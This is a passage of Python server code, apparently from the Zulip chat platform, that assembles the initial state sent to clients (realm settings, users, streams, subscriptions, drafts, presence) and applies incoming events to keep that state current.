# their old drafts stored on the server will be deleted and
# simply retained in local storage. In which case user_drafts
# would just be an empty queryset.
user_draft_objects = Draft.objects.filter(user_profile=user_profile).order_by(
"-last_edit_time"
)[: settings.MAX_DRAFTS_IN_REGISTER_RESPONSE]
user_draft_dicts = [draft.to_dict() for draft in user_draft_objects]
state["drafts"] = user_draft_dicts
if want("muted_topics"):
state["muted_topics"] = [] if user_profile is None else get_topic_mutes(user_profile)
if want("muted_users"):
state["muted_users"] = [] if user_profile is None else get_user_mutes(user_profile)
if want("presence"):
state["presences"] = (
{} if user_profile is None else get_presences_for_realm(realm, slim_presence)
)
# Send server_timestamp, to match the format of `GET /presence` requests.
state["server_timestamp"] = time.time()
if want("realm"):
# The realm bundle includes both realm properties and server
# properties, since it's rare that one would one one and not
# the other. We expect most clients to want it.
#
# A note on naming: For some settings, one could imagine
# having a server-level value and a realm-level value (with
# the server value serving as the default for the realm
# value). For such settings, we prefer the following naming
# scheme:
#
# * realm_inline_image_preview (current realm setting)
# * server_inline_image_preview (server-level default)
#
# In situations where for backwards-compatibility reasons we
# have an unadorned name, we should arrange that clients using
# that unadorned name work correctly (i.e. that should be the
# currently active setting, not a server-level default).
#
# Other settings, which are just server-level settings or data
# about the version of Zulip, can be named without prefixes,
# e.g. giphy_rating_options or development_environment.
for property_name in Realm.property_types:
state["realm_" + property_name] = getattr(realm, property_name)
# Most state is handled via the property_types framework;
# these manual entries are for those realm settings that don't
# fit into that framework.
state["realm_authentication_methods"] = realm.authentication_methods_dict()
# We pretend these features are disabled because anonymous
# users can't access them. In the future, we may want to move
# this logic to the frontends, so that we can correctly
# display what these fields are in the settings.
state["realm_allow_message_editing"] = (
False if user_profile is None else realm.allow_message_editing
)
state["realm_edit_topic_policy"] = (
Realm.POLICY_ADMINS_ONLY if user_profile is None else realm.edit_topic_policy
)
state["realm_delete_own_message_policy"] = (
Realm.POLICY_ADMINS_ONLY if user_profile is None else realm.delete_own_message_policy
)
# TODO: Can we delete these lines? They seem to be in property_types...
state["realm_message_content_edit_limit_seconds"] = realm.message_content_edit_limit_seconds
state[
"realm_message_content_delete_limit_seconds"
] = realm.message_content_delete_limit_seconds
state[
"realm_community_topic_editing_limit_seconds"
] = Realm.DEFAULT_COMMUNITY_TOPIC_EDITING_LIMIT_SECONDS
# This setting determines whether to send presence and also
# whether to display of users list in the right sidebar; we
# want both behaviors for logged-out users. We may in the
# future choose to move this logic to the frontend.
state["realm_presence_disabled"] = True if user_profile is None else realm.presence_disabled
# Important: Encode units in the client-facing API name.
state["max_avatar_file_size_mib"] = settings.MAX_AVATAR_FILE_SIZE_MIB
state["max_file_upload_size_mib"] = settings.MAX_FILE_UPLOAD_SIZE
state["max_icon_file_size_mib"] = settings.MAX_ICON_FILE_SIZE_MIB
state["realm_upload_quota_mib"] = realm.upload_quota_bytes()
state["realm_icon_url"] = realm_icon_url(realm)
state["realm_icon_source"] = realm.icon_source
add_realm_logo_fields(state, realm)
state["realm_uri"] = realm.uri
state["realm_bot_domain"] = realm.get_bot_domain()
state["realm_available_video_chat_providers"] = realm.VIDEO_CHAT_PROVIDERS
state["settings_send_digest_emails"] = settings.SEND_DIGEST_EMAILS
state["realm_digest_emails_enabled"] = (
realm.digest_emails_enabled and settings.SEND_DIGEST_EMAILS
)
state["realm_email_auth_enabled"] = email_auth_enabled(realm)
state["realm_password_auth_enabled"] = password_auth_enabled(realm)
state["server_generation"] = settings.SERVER_GENERATION
state["realm_is_zephyr_mirror_realm"] = realm.is_zephyr_mirror_realm
state["development_environment"] = settings.DEVELOPMENT
state["realm_plan_type"] = realm.plan_type
state["zulip_plan_is_not_limited"] = realm.plan_type != Realm.PLAN_TYPE_LIMITED
state["upgrade_text_for_wide_organization_logo"] = str(Realm.UPGRADE_TEXT_STANDARD)
state["password_min_length"] = settings.PASSWORD_MIN_LENGTH
state["password_min_guesses"] = settings.PASSWORD_MIN_GUESSES
state["server_inline_image_preview"] = settings.INLINE_IMAGE_PREVIEW
state["server_inline_url_embed_preview"] = settings.INLINE_URL_EMBED_PREVIEW
state["server_avatar_changes_disabled"] = settings.AVATAR_CHANGES_DISABLED
state["server_name_changes_disabled"] = settings.NAME_CHANGES_DISABLED
state["server_web_public_streams_enabled"] = settings.WEB_PUBLIC_STREAMS_ENABLED
state["giphy_rating_options"] = realm.GIPHY_RATING_OPTIONS
state["server_needs_upgrade"] = is_outdated_server(user_profile)
state[
"event_queue_longpoll_timeout_seconds"
] = settings.EVENT_QUEUE_LONGPOLL_TIMEOUT_SECONDS
# TODO: Should these have the realm prefix replaced with server_?
state["realm_push_notifications_enabled"] = push_notifications_enabled()
state["realm_default_external_accounts"] = DEFAULT_EXTERNAL_ACCOUNTS
if settings.JITSI_SERVER_URL is not None:
state["jitsi_server_url"] = settings.JITSI_SERVER_URL.rstrip("/")
else: # nocoverage
state["jitsi_server_url"] = None
if realm.notifications_stream and not realm.notifications_stream.deactivated:
notifications_stream = realm.notifications_stream
state["realm_notifications_stream_id"] = notifications_stream.id
else:
state["realm_notifications_stream_id"] = -1
signup_notifications_stream = realm.get_signup_notifications_stream()
if signup_notifications_stream:
state["realm_signup_notifications_stream_id"] = signup_notifications_stream.id
else:
state["realm_signup_notifications_stream_id"] = -1
state["max_stream_name_length"] = Stream.MAX_NAME_LENGTH
state["max_stream_description_length"] = Stream.MAX_DESCRIPTION_LENGTH
state["max_topic_length"] = MAX_TOPIC_NAME_LENGTH
state["max_message_length"] = settings.MAX_MESSAGE_LENGTH
if realm.demo_organization_scheduled_deletion_date is not None:
state["demo_organization_scheduled_deletion_date"] = datetime_to_timestamp(
realm.demo_organization_scheduled_deletion_date
)
if want("realm_user_settings_defaults"):
realm_user_default = RealmUserDefault.objects.get(realm=realm)
state["realm_user_settings_defaults"] = {}
for property_name in RealmUserDefault.property_types:
state["realm_user_settings_defaults"][property_name] = getattr(
realm_user_default, property_name
)
state["realm_user_settings_defaults"][
"emojiset_choices"
] = RealmUserDefault.emojiset_choices()
state["realm_user_settings_defaults"][
"available_notification_sounds"
] = get_available_notification_sounds()
if want("realm_domains"):
state["realm_domains"] = get_realm_domains(realm)
if want("realm_emoji"):
state["realm_emoji"] = realm.get_emoji()
if want("realm_linkifiers"):
state["realm_linkifiers"] = linkifiers_for_realm(realm.id)
# Backwards compatibility code.
if want("realm_filters"):
state["realm_filters"] = realm_filters_for_realm(realm.id)
if want("realm_playgrounds"):
state["realm_playgrounds"] = get_realm_playgrounds(realm)
if want("realm_user_groups"):
state["realm_user_groups"] = user_groups_in_realm_serialized(realm)
if user_profile is not None:
settings_user = user_profile
else:
# When UserProfile=None, we want to serve the values for various
# settings as the defaults. Instead of copying the default values
# from models.py here, we access these default values from a
# temporary UserProfile object that will not be saved to the database.
#
# We also can set various fields to avoid duplicating code
# unnecessarily.
settings_user = UserProfile(
full_name="Anonymous User",
email="username@example.com",
delivery_email="username@example.com",
realm=realm,
# We tag logged-out users as guests because most guest
# restrictions apply to these users as well, and it lets
# us avoid unnecessary conditionals.
role=UserProfile.ROLE_GUEST,
is_billing_admin=False,
avatar_source=UserProfile.AVATAR_FROM_GRAVATAR,
# ID=0 is not used in real Zulip databases, ensuring this is unique.
id=0,
)
if want("realm_user"):
state["raw_users"] = get_raw_user_data(
realm,
user_profile,
client_gravatar=client_gravatar,
user_avatar_url_field_optional=user_avatar_url_field_optional,
# Don't send custom profile field values to spectators.
include_custom_profile_fields=user_profile is not None,
)
state["cross_realm_bots"] = list(get_cross_realm_dicts())
# For the user's own avatar URL, we force
# client_gravatar=False, since that saves some unnecessary
# client-side code for handing medium-size avatars. See #8253
# for details.
state["avatar_source"] = settings_user.avatar_source
state["avatar_url_medium"] = avatar_url(
settings_user,
medium=True,
client_gravatar=False,
)
state["avatar_url"] = avatar_url(
settings_user,
medium=False,
client_gravatar=False,
)
state["can_create_private_streams"] = settings_user.can_create_private_streams()
state["can_create_public_streams"] = settings_user.can_create_public_streams()
# TODO/compatibility: Deprecated in Zulip 5.0 (feature level
# 102); we can remove this once we no longer need to support
# legacy mobile app versions that read the old property.
state["can_create_streams"] = (
settings_user.can_create_private_streams()
or settings_user.can_create_public_streams()
or settings_user.can_create_web_public_streams()
)
state["can_create_web_public_streams"] = settings_user.can_create_web_public_streams()
state["can_subscribe_other_users"] = settings_user.can_subscribe_other_users()
state["can_invite_others_to_realm"] = settings_user.can_invite_others_to_realm()
state["is_admin"] = settings_user.is_realm_admin
state["is_owner"] = settings_user.is_realm_owner
state["is_moderator"] = settings_user.is_moderator
state["is_guest"] = settings_user.is_guest
state["is_billing_admin"] = settings_user.is_billing_admin
state["user_id"] = settings_user.id
state["email"] = settings_user.email
state["delivery_email"] = settings_user.delivery_email
state["full_name"] = settings_user.full_name
if want("realm_bot"):
state["realm_bots"] = [] if user_profile is None else get_owned_bot_dicts(user_profile)
# This does not yet have an apply_event counterpart, since currently,
# new entries for EMBEDDED_BOTS can only be added directly in the codebase.
if want("realm_embedded_bots"):
realm_embedded_bots = []
for bot in EMBEDDED_BOTS:
realm_embedded_bots.append(
{"name": bot.name, "config": load_bot_config_template(bot.name)}
)
state["realm_embedded_bots"] = realm_embedded_bots
# This does not have an apply_events counterpart either since
# this data is mostly static.
if want("realm_incoming_webhook_bots"):
realm_incoming_webhook_bots = []
for integration in WEBHOOK_INTEGRATIONS:
realm_incoming_webhook_bots.append(
{
"name": integration.name,
"config": {c[1]: c[0] for c in integration.config_options},
}
)
state["realm_incoming_webhook_bots"] = realm_incoming_webhook_bots
if want("recent_private_conversations"):
# A data structure containing records of this form:
#
# [{'max_message_id': 700175, 'user_ids': [801]}]
#
# for all recent private message conversations, ordered by the
# highest message ID in the conversation. The user_ids list
# is the list of users other than the current user in the
# private message conversation (so it is [] for PMs to self).
# Note that raw_recent_private_conversations is an
# intermediate form as a dictionary keyed by recipient_id,
# which is more efficient to update, and is rewritten to the
# final format in post_process_state.
state["raw_recent_private_conversations"] = (
{} if user_profile is None else get_recent_private_conversations(user_profile)
)
if want("subscription"):
if user_profile is not None:
sub_info = gather_subscriptions_helper(
user_profile,
include_subscribers=include_subscribers,
)
else:
sub_info = get_web_public_subs(realm)
state["subscriptions"] = sub_info.subscriptions
state["unsubscribed"] = sub_info.unsubscribed
state["never_subscribed"] = sub_info.never_subscribed
if want("update_message_flags") and want("message"):
# Keeping unread_msgs updated requires both message flag updates and
# message updates. This is due to the fact that new messages will not
# generate a flag update so we need to use the flags field in the
# message event.
if user_profile is not None:
state["raw_unread_msgs"] = get_raw_unread_data(user_profile)
else:
# For logged-out visitors, we treat all messages as read;
# calling this helper lets us return empty objects in the
# appropriate format.
state["raw_unread_msgs"] = extract_unread_data_from_um_rows([], user_profile)
if want("starred_messages"):
state["starred_messages"] = (
[] if user_profile is None else get_starred_message_ids(user_profile)
)
if want("stream"):
if include_streams:
# The web app doesn't use the data from here; instead,
# it uses data from state["subscriptions"] and other
# places.
if user_profile is not None:
state["streams"] = do_get_streams(
user_profile, include_all_active=user_profile.is_realm_admin
)
else:
# TODO: This line isn't used by the web app because it
# gets these data via the `subscriptions` key; it will
# be used when the mobile apps support logged-out
# access.
state["streams"] = get_web_public_streams(realm) # nocoverage
if want("default_streams"):
if settings_user.is_guest:
# Guest users and logged-out users don't have access to
# all default streams, so we pretend the organization
# doesn't have any.
state["realm_default_streams"] = []
else:
state["realm_default_streams"] = streams_to_dicts_sorted(
get_default_streams_for_realm(realm.id)
)
if want("default_stream_groups"):
if settings_user.is_guest:
state["realm_default_stream_groups"] = []
else:
state["realm_default_stream_groups"] = default_stream_groups_to_dicts_sorted(
get_default_stream_groups(realm)
)
if want("stop_words"):
state["stop_words"] = read_stop_words()
if want("update_display_settings") and not user_settings_object:
for prop in UserProfile.display_settings_legacy:
state[prop] = getattr(settings_user, prop)
state["emojiset_choices"] = UserProfile.emojiset_choices()
state["timezone"] = settings_user.timezone
if want("update_global_notifications") and not user_settings_object:
for notification in UserProfile.notification_settings_legacy:
state[notification] = getattr(settings_user, notification)
state["available_notification_sounds"] = get_available_notification_sounds()
if want("user_settings"):
state["user_settings"] = {}
for prop in UserProfile.property_types:
state["user_settings"][prop] = getattr(settings_user, prop)
state["user_settings"]["emojiset_choices"] = UserProfile.emojiset_choices()
state["user_settings"]["timezone"] = settings_user.timezone
state["user_settings"][
"available_notification_sounds"
] = get_available_notification_sounds()
if want("user_status"):
# We require creating an account to access statuses.
state["user_status"] = {} if user_profile is None else get_user_info_dict(realm_id=realm.id)
if want("video_calls"):
state["has_zoom_token"] = settings_user.zoom_token is not None
if want("giphy"):
# Normally, it would be a nasty security bug to send a
# server's API key to end users. However, GIPHY's API key
# security model is precisely to do that; every service
# publishes its API key (and GIPHY's client-side JS libraries
# require the API key to work). This security model makes
# sense because GIPHY API keys are all essentially equivalent
# in letting one search for GIFs; GIPHY only requires API keys
# to exist at all so that they can deactivate them in cases of
# abuse.
state["giphy_api_key"] = settings.GIPHY_API_KEY if settings.GIPHY_API_KEY else ""
if user_profile is None:
# To ensure we have the correct user state set.
assert state["is_admin"] is False
assert state["is_owner"] is False
assert state["is_guest"] is True
return state
def apply_events(
user_profile: UserProfile,
*,
state: Dict[str, Any],
events: Iterable[Dict[str, Any]],
fetch_event_types: Optional[Collection[str]],
client_gravatar: bool,
slim_presence: bool,
include_subscribers: bool,
) -> None:
for event in events:
if event["type"] == "restart":
raise RestartEventException()
if fetch_event_types is not None and event["type"] not in fetch_event_types:
# TODO: continuing here is not, most precisely, correct.
# In theory, an event of one type, e.g. `realm_user`,
# could modify state that doesn't come from that
# `fetch_event_types` value, e.g. the `our_person` part of
# that code path. But it should be extremely rare, and
# fixing that will require a nontrivial refactor of
# `apply_event`. For now, be careful in your choice of
# `fetch_event_types`.
continue
apply_event(
user_profile,
state=state,
event=event,
client_gravatar=client_gravatar,
slim_presence=slim_presence,
include_subscribers=include_subscribers,
)
def apply_event(
user_profile: UserProfile,
*,
state: Dict[str, Any],
event: Dict[str, Any],
client_gravatar: bool,
slim_presence: bool,
include_subscribers: bool,
) -> None:
if event["type"] == "message":
state["max_message_id"] = max(state["max_message_id"], event["message"]["id"])
if "raw_unread_msgs" in state:
apply_unread_message_event(
user_profile,
state["raw_unread_msgs"],
event["message"],
event["flags"],
)
if event["message"]["type"] != "stream":
if "raw_recent_private_conversations" in state:
# Handle maintaining the recent_private_conversations data structure.
conversations = state["raw_recent_private_conversations"]
recipient_id = get_recent_conversations_recipient_id(
user_profile, event["message"]["recipient_id"], event["message"]["sender_id"]
)
if recipient_id not in conversations:
conversations[recipient_id] = dict(
user_ids=sorted(
user_dict["id"]
for user_dict in event["message"]["display_recipient"]
if user_dict["id"] != user_profile.id
),
)
conversations[recipient_id]["max_message_id"] = event["message"]["id"]
return
# Below, we handle maintaining first_message_id.
for sub_dict in state.get("subscriptions", []):
if event["message"]["stream_id"] == sub_dict["stream_id"]:
if sub_dict["first_message_id"] is None:
sub_dict["first_message_id"] = event["message"]["id"]
for stream_dict in state.get("streams", []):
if event["message"]["stream_id"] == stream_dict["stream_id"]:
if stream_dict["first_message_id"] is None:
stream_dict["first_message_id"] = event["message"]["id"]
elif event["type"] == "heartbeat":
# It may be impossible for a heartbeat event to actually reach
# this code path. But in any case, they're noops.
pass
elif event["type"] == "drafts":
if event["op"] == "add":
state["drafts"].extend(event["drafts"])
else:
if event["op"] == "update":
event_draft_idx = event["draft"]["id"]
def _draft_update_action(i: int) -> None:
state["drafts"][i] = event["draft"]
elif event["op"] == "remove":
event_draft_idx = event["draft_id"]
def _draft_update_action(i: int) -> None:
del state["drafts"][i]
# We have to perform a linear search for the draft that
# was either edited or removed since we have a list
# ordered by the last edited timestamp and not id.
state_draft_idx = None
for idx, draft in enumerate(state["drafts"]):
if draft["id"] == event_draft_idx:
state_draft_idx = idx
break
assert state_draft_idx is not None
_draft_update_action(state_draft_idx)
elif event["type"] == "hotspots":
state["hotspots"] = event["hotspots"]
elif event["type"] == "custom_profile_fields":
state["custom_profile_fields"] = event["fields"]
custom_profile_field_ids = {field["id"] for field in state["custom_profile_fields"]}
if "raw_users" in state:
for user_dict in state["raw_users"].values():
if "profile_data" not in user_dict:
continue
profile_data = user_dict["profile_data"]
for (field_id, field_data) in list(profile_data.items()):
if int(field_id) not in custom_profile_field_ids:
del profile_data[field_id]
elif event["type"] == "realm_user":
person = event["person"]
person_user_id = person["user_id"]
if event["op"] == "add":
person = copy.deepcopy(person)
if client_gravatar:
if person["avatar_url"].startswith("https://secure.gravatar.com"):
person["avatar_url"] = None
person["is_active"] = True
if not person["is_bot"]:
person["profile_data"] = {}
state["raw_users"][person_user_id] = person
elif event["op"] == "remove":
state["raw_users"][person_user_id]["is_active"] = False
elif event["op"] == "update":
is_me = person_user_id == user_profile.id
if is_me:
if "avatar_url" in person and "avatar_url" in state:
state["avatar_source"] = person["avatar_source"]
state["avatar_url"] = person["avatar_url"]
state["avatar_url_medium"] = person["avatar_url_medium"]
if "role" in person:
state["is_admin"] = is_administrator_role(person["role"])
state["is_owner"] = person["role"] == UserProfile.ROLE_REALM_OWNER
state["is_moderator"] = person["role"] == UserProfile.ROLE_MODERATOR
state["is_guest"] = person["role"] == UserProfile.ROLE_GUEST
# Recompute properties based on is_admin/is_guest
state["can_create_private_streams"] = user_profile.can_create_private_streams()
state["can_create_public_streams"] = user_profile.can_create_public_streams()
state[
"can_create_web_public_streams"
] = user_profile.can_create_web_public_streams()
state["can_create_streams"] = (
state["can_create_private_streams"]
or state["can_create_public_streams"]
or state["can_create_web_public_streams"]
)
state["can_subscribe_other_users"] = user_profile.can_subscribe_other_users()
state["can_invite_others_to_realm"] = user_profile.can_invite_others_to_realm()
# TODO: Probably rather than writing the perfect
# live-update code for the case of racing with the
# current user changing roles, we should just do a
# full refetch.
if "never_subscribed" in state:
sub_info = gather_subscriptions_helper(
user_profile,
include_subscribers=include_subscribers,
)
state["subscriptions"] = sub_info.subscriptions
state["unsubscribed"] = sub_info.unsubscribed
state["never_subscribed"] = sub_info.never_subscribed
if "streams" in state:
state["streams"] = do_get_streams(
user_profile, include_all_active=user_profile.is_realm_admin
)
if state["is_guest"]:
state["realm_default_streams"] = []
else:
state["realm_default_streams"] = streams_to_dicts_sorted(
get_default_streams_for_realm(user_profile.realm_id)
)
for field in ["delivery_email", "email", "full_name", "is_billing_admin"]:
if field in person and field in state:
state[field] = person[field]
if "new_email" in person:
state["email"] = person["new_email"]
# In the unlikely event that the current user
# just changed to/from being an admin, we need
# to add/remove the data on all bots in the
# realm. This is ugly and probably better
# solved by removing the all-realm-bots data
# given to admin users from this flow.
if "role" in person and "realm_bots" in state:
prev_state = state["raw_users"][user_profile.id]
was_admin = prev_state["is_admin"]
now_admin = is_administrator_role(person["role"])
if was_admin and not now_admin:
state["realm_bots"] = []
if not was_admin and now_admin:
state["realm_bots"] = get_owned_bot_dicts(user_profile)
if client_gravatar and "avatar_url" in person:
# Respect the client_gravatar setting in the `users` data.
if person["avatar_url"].startswith("https://secure.gravatar.com"):
person["avatar_url"] = None
person["avatar_url_medium"] = None
if person_user_id in state["raw_users"]:
p = state["raw_users"][person_user_id]
for field in p:
if field in person:
p[field] = person[field]
if "role" in person:
p["is_admin"] = is_administrator_role(person["role"])
p["is_owner"] = person["role"] == UserProfile.ROLE_REALM_OWNER
p["is_guest"] = person["role"] == UserProfile.ROLE_GUEST
if "is_billing_admin" in person:
p["is_billing_admin"] = person["is_billing_admin"]
if "custom_profile_field" in person:
custom_field_id = person["custom_profile_field"]["id"]
custom_field_new_value = person["custom_profile_field"]["value"]
if "rendered_value" in person["custom_profile_field"]:
p["profile_data"][str(custom_field_id)] = {
"value": custom_field_new_value,
"rendered_value": person["custom_profile_field"]["rendered_value"],
}
else:
p["profile_data"][str(custom_field_id)] = {
"value": custom_field_new_value,
}
if "new_email" in person:
p["email"] = person["new_email"]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_bot":
if event["op"] == "add":
state["realm_bots"].append(event["bot"])
elif event["op"] == "remove":
user_id = event["bot"]["user_id"]
for bot in state["realm_bots"]:
if bot["user_id"] == user_id:
bot["is_active"] = False
elif event["op"] == "delete":
state["realm_bots"] = [
item for item in state["realm_bots"] if item["user_id"] != event["bot"]["user_id"]
]
elif event["op"] == "update":
for bot in state["realm_bots"]:
if bot["user_id"] == event["bot"]["user_id"]:
if "owner_id" in event["bot"]:
bot_owner_id = event["bot"]["owner_id"]
bot["owner_id"] = bot_owner_id
else:
bot.update(event["bot"])
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "stream":
if event["op"] == "create":
for stream in event["streams"]:
if not stream["invite_only"]:
stream_data = copy.deepcopy(stream)
if include_subscribers:
stream_data["subscribers"] = []
# We know the stream has no traffic, and this
# field is not present in the event.
#
# TODO: Probably this should just be added to the event.
stream_data["stream_weekly_traffic"] = None
# Add stream to never_subscribed (if not invite_only)
state["never_subscribed"].append(stream_data)
if "streams" in state:
state["streams"].append(stream)
if "streams" in state:
state["streams"].sort(key=lambda elt: elt["name"])
if event["op"] == "delete":
deleted_stream_ids = {stream["stream_id"] for stream in event["streams"]}
if "streams" in state:
state["streams"] = [
s for s in state["streams"] if s["stream_id"] not in deleted_stream_ids
]
state["never_subscribed"] = [
stream
for stream in state["never_subscribed"]
if stream["stream_id"] not in deleted_stream_ids
]
if event["op"] == "update":
# For legacy reasons, we call stream data 'subscriptions' in
# the state var here, for the benefit of the JS code.
for obj in state["subscriptions"]:
if obj["name"].lower() == event["name"].lower():
obj[event["property"]] = event["value"]
if event["property"] == "description":
obj["rendered_description"] = event["rendered_description"]
if event.get("history_public_to_subscribers") is not None:
obj["history_public_to_subscribers"] = event[
"history_public_to_subscribers"
]
if event.get("is_web_public") is not None:
obj["is_web_public"] = event["is_web_public"]
# Also update the pure streams data
if "streams" in state:
for stream in state["streams"]:
if stream["name"].lower() == event["name"].lower():
prop = event["property"]
if prop in stream:
stream[prop] = event["value"]
if prop == "description":
stream["rendered_description"] = event["rendered_description"]
if event.get("history_public_to_subscribers") is not None:
stream["history_public_to_subscribers"] = event[
"history_public_to_subscribers"
]
if event.get("is_web_public") is not None:
stream["is_web_public"] = event["is_web_public"]
elif event["type"] == "default_streams":
state["realm_default_streams"] = event["default_streams"]
elif event["type"] == "default_stream_groups":
state["realm_default_stream_groups"] = event["default_stream_groups"]
elif event["type"] == "realm":
if event["op"] == "update":
field = "realm_" + event["property"]
state[field] = event["value"]
if event["property"] == "plan_type":
# Then there are some extra fields that also need to be set.
state["zulip_plan_is_not_limited"] = event["value"] != Realm.PLAN_TYPE_LIMITED
state["realm_upload_quota_mib"] = event["extra_data"]["upload_quota"]
policy_permission_dict = {
"create_public_stream_policy": "can_create_public_streams",
"create_private_stream_policy": "can_create_private_streams",
"create_web_public_stream_policy": "can_create_web_public_streams",
"invite_to_stream_policy": "can_subscribe_other_users",
"invite_to_realm_policy": "can_invite_others_to_realm",
}
# Tricky interaction: Whether we can create streams and can subscribe other users
# can get changed here.
if field == "realm_waiting_period_threshold":
for policy, permission in policy_permission_dict.items():
if permission in state:
state[permission] = user_profile.has_permission(policy)
if event["property"] in policy_permission_dict.keys():
if policy_permission_dict[event["property"]] in state:
state[policy_permission_dict[event["property"]]] = user_profile.has_permission(
event["property"]
)
# Finally, we need to recompute this value from its inputs.
state["can_create_streams"] = (
state["can_create_private_streams"]
or state["can_create_public_streams"]
or state["can_create_web_public_streams"]
)
elif event["op"] == "update_dict":
for key, value in event["data"].items():
state["realm_" + key] = value
# It's a bit messy, but this is where we need to
# update the state for whether password authentication
# is enabled on this server.
if key == "authentication_methods":
state["realm_password_auth_enabled"] = value["Email"] or value["LDAP"]
state["realm_email_auth_enabled"] = value["Email"]
elif event["op"] == "deactivated":
# The realm has just been deactivated. If our request had
# arrived a moment later, we'd have rendered the
# deactivation UI; if it'd been a moment sooner, we've
# have rendered the app and then immediately got this
# event (or actually, more likely, an auth error on GET
# /events) and immediately reloaded into the same
# deactivation UI. Passing achieves the same result.
pass
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_user_settings_defaults":
if event["op"] == "update":
state["realm_user_settings_defaults"][event["property"]] = event["value"]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "subscription":
if event["op"] == "add":
added_stream_ids = {sub["stream_id"] for sub in event["subscriptions"]}
was_added = lambda s: s["stream_id"] in added_stream_ids
existing_stream_ids = {sub["stream_id"] for sub in state["subscriptions"]}
# add the new subscriptions
for sub in event["subscriptions"]:
if sub["stream_id"] not in existing_stream_ids:
if "subscribers" in sub and not include_subscribers:
sub = copy.deepcopy(sub)
del sub["subscribers"]
state["subscriptions"].append(sub)
# remove them from unsubscribed if they had been there
state["unsubscribed"] = [s for s in state["unsubscribed"] if not was_added(s)]
# remove them from never_subscribed if they had been there
state["never_subscribed"] = [s for s in state["never_subscribed"] if not was_added(s)]
elif event["op"] == "remove":
removed_stream_ids = {sub["stream_id"] for sub in event["subscriptions"]}
was_removed = lambda s: s["stream_id"] in removed_stream_ids
# Find the subs we are affecting.
removed_subs = list(filter(was_removed, state["subscriptions"]))
# Remove our user from the subscribers of the removed subscriptions.
if include_subscribers:
for sub in removed_subs:
sub["subscribers"].remove(user_profile.id)
state["unsubscribed"] += removed_subs
# Now filter out the removed subscriptions from subscriptions.
state["subscriptions"] = [s for s in state["subscriptions"] if not was_removed(s)]
elif event["op"] == "update":
for sub in state["subscriptions"]:
if sub["stream_id"] == event["stream_id"]:
sub[event["property"]] = event["value"]
elif event["op"] == "peer_add":
if include_subscribers:
stream_ids = set(event["stream_ids"])
user_ids = set(event["user_ids"])
for sub_dict in [
state["subscriptions"],
state["unsubscribed"],
state["never_subscribed"],
]:
for sub in sub_dict:
if sub["stream_id"] in stream_ids:
subscribers = set(sub["subscribers"]) | user_ids
sub["subscribers"] = sorted(list(subscribers))
elif event["op"] == "peer_remove":
if include_subscribers:
stream_ids = set(event["stream_ids"])
user_ids = set(event["user_ids"])
for sub_dict in [
state["subscriptions"],
state["unsubscribed"],
state["never_subscribed"],
]:
for sub in sub_dict:
if sub["stream_id"] in stream_ids:
subscribers = set(sub["subscribers"]) - user_ids
sub["subscribers"] = sorted(list(subscribers))
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "presence":
if slim_presence:
user_key = str(event["user_id"])
else:
user_key = event["email"]
state["presences"][user_key] = get_presence_for_user(event["user_id"], slim_presence)[
user_key
]
elif event["type"] == "update_message":
# We don't return messages in /register, so we don't need to
# do anything for content updates, but we may need to update
# the unread_msgs data if the topic of an unread message changed.
if "new_stream_id" in event:
stream_dict = state["raw_unread_msgs"]["stream_dict"]
stream_id = event["new_stream_id"]
for message_id in event["message_ids"]:
if message_id in stream_dict:
stream_dict[message_id]["stream_id"] = stream_id
if TOPIC_NAME in event:
stream_dict = state["raw_unread_msgs"]["stream_dict"]
topic = event[TOPIC_NAME]
for message_id in event["message_ids"]:
if message_id in stream_dict:
stream_dict[message_id]["topic"] = topic
elif event["type"] == "delete_message":
if "message_id" in event:
message_ids = [event["message_id"]]
else:
message_ids = event["message_ids"] # nocoverage
max_message = (
Message.objects.filter(usermessage__user_profile=user_profile).order_by("-id").first()
)
if max_message:
state["max_message_id"] = max_message.id
else:
state["max_message_id"] = -1
if "raw_unread_msgs" in state:
for remove_id in message_ids:
remove_message_id_from_unread_mgs(state["raw_unread_msgs"], remove_id)
# The remainder of this block is about maintaining recent_private_conversations
if "raw_recent_private_conversations" not in state or event["message_type"] != "private":
return
# OK, we just deleted what had been the max_message_id for
# this recent conversation; we need to recompute that value
# from scratch. Definitely don't need to re-query everything,
# but this case is likely rare enough that it's reasonable to do so.
state["raw_recent_private_conversations"] = get_recent_private_conversations(user_profile)
elif event["type"] == "reaction":
# The client will get the message with the reactions directly
pass
elif event["type"] == "submessage":
# The client will get submessages with their messages
pass
elif event["type"] == "typing":
# Typing notification events are transient and thus ignored
pass
elif event["type"] == "attachment":
# Attachment events are just for updating the "uploads" UI;
# they are not sent directly.
pass
elif event["type"] == "update_message_flags":
# We don't return messages in `/register`, so most flags we
# can ignore, but we do need to update the unread_msgs data if
# unread state is changed.
if "raw_unread_msgs" in state and event["flag"] == "read" and event["op"] == "add":
for remove_id in event["messages"]:
remove_message_id_from_unread_mgs(state["raw_unread_msgs"], remove_id)
if event["flag"] == "starred" and "starred_messages" in state:
if event["op"] == "add":
state["starred_messages"] += event["messages"]
if event["op"] == "remove":
state["starred_messages"] = [
message
for message in state["starred_messages"]
if not (message in event["messages"])
]
elif event["type"] == "realm_domains":
if event["op"] == "add":
state["realm_domains"].append(event["realm_domain"])
elif event["op"] == "change":
for realm_domain in state["realm_domains"]:
if realm_domain["domain"] == event["realm_domain"]["domain"]:
realm_domain["allow_subdomains"] = event["realm_domain"]["allow_subdomains"]
elif event["op"] == "remove":
state["realm_domains"] = [
realm_domain
for realm_domain in state["realm_domains"]
if realm_domain["domain"] != event["domain"]
]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_emoji":
state["realm_emoji"] = event["realm_emoji"]
elif event["type"] == "realm_export":
# These realm export events are only available to
# administrators, and aren't included in page_params.
pass
elif event["type"] == "alert_words":
state["alert_words"] = event["alert_words"]
elif event["type"] == "muted_topics":
state["muted_topics"] = event["muted_topics"]
elif event["type"] == "muted_users":
state["muted_users"] = event["muted_users"]
elif event["type"] == "realm_filters":
state["realm_filters"] = event["realm_filters"]
elif event["type"] == "realm_linkifiers":
state["realm_linkifiers"] = event["realm_linkifiers"]
elif event["type"] == "realm_playgrounds":
state["realm_playgrounds"] = event["realm_playgrounds"]
elif event["type"] == "update_display_settings":
